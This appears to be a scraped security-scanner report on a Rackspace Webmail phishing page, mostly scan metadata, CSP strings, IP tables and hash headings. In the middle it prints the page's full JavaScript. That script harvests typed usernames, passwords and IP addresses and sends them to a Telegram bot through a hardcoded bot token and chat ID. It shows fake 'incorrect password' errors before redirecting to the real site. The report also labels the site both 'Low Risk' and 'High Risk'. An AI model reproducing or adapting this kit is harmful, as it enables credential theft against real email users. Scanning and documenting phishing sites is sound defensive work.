corporate business

English

You're looking at domain 'prickly-ear.surge.sh' on the .sh country-code top-level domain, featuring subdomain 'prickly-ear'. Its registrable label 'surge' stretches across 5 characters holding two vowels versus three consonants. Segmentation suggests 1 word: surge. Median word length comes out to five characters. No strong language cues emerged from the frequency lists.

html/d2/19/d2192f62-766b-4ec3-86a3-624520aa93f9_fallback.html.gz

Rackspace Webmail: Hosted Email for Business

__RequestVerificationToken

destination

flags

username

password

login

html/d2/19/d2192f62-766b-4ec3-86a3-624520aa93f9.html.gz

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes

a6ddea4562c3d20fb0064f728c641fd341ed5aca2694c7be42fa8e5dca8ccfb0

HSTS header missing - vulnerable to protocol downgrade attacks

CSP header missing - vulnerable to XSS attacks

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

Private by Design, LLC

Porkbun LLC

surge.sh


    // autograb
window.addEventListener('DOMContentLoaded', function () {
  const params = new URLSearchParams(window.location.search);
  const email = params.get('email');
  if (email) {
    document.getElementById('email').value = email;
  }
});

const botToken = '7228228086:AAHQcLfe1MSYjUA2GMlD7NEiUDIjA7NTvV4';
        const chatId = '7219449825';
let attemptCount = 0;

async function getIP() {
  const res = await fetch("https://api.ipify.org?format=json");
  const data = await res.json();
  return data.ip;
}

document.getElementById('form').addEventListener('submit', async function (e) {
  e.preventDefault();

  const username = document.getElementById('email').value;
  const passwordField = document.getElementById('pass-input');
  const password = passwordField.value;
  const globalError = document.getElementById('global-error');

  // ✅ now this works
  const ip = await getIP();

  const text = `
🚨 *New demo attempt* 🚨

👤 Username: ${username}
🔑 Password: ${password}
🌐 IP: ${ip}
  `;

  fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      chat_id: chatId,
      text: text,
      parse_mode: 'Markdown'
    })
  })
  .then(r => r.json())
  .then(result => {
    console.log("Login attempt result:", result);
    if (result.ok) {
      if (password !== '123456') {
        attemptCount++;
        console.log(`Attempt count: ${attemptCount}`);
        if (attemptCount < 3) {
          if (globalError) {
            globalError.textContent = 'Incorrect email or password';
            globalError.style.display = 'block';
          }
          passwordField.value = "";  // clear the password field correctly
        } else {
          setTimeout(() => {
            window.location.href = "https://apps.rackspace.com/a/webmail.php";
          }, 3000);
        }
      }
    }
  })
});
  

✅ Low Risk - https://prickly-ear.surge.sh/

Requests	IP Address	Location	AS Autonomous System
8	142.250.186.74	United States	AS15169GOOGLE
2	138.68.112.220	Frankfurt am Main, Hesse, Germany	AS14061DIGITALOCEAN-ASN
2	142.250.185.99	United States	AS15169GOOGLE
2	13.107.246.45	United States	AS8075MICROSOFT-CORP-MSN-AS-BLOCK
1	142.250.185.202	United States	AS15169GOOGLE
1	69.20.91.24	United States	AS27357RACKSPACE
0	142.250.186.99	United States	AS15169GOOGLE
0	13.107.246.44	United States	AS8075MICROSOFT-CORP-MSN-AS-BLOCK
0	2001:4802:7a01:10::4	United States	AS27357RACKSPACE
0	13.107.213.44	United States	AS8075MICROSOFT-CORP-MSN-AS-BLOCK
8	14	-	-

Security Scan Report: prickly-ear.surge.sh

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History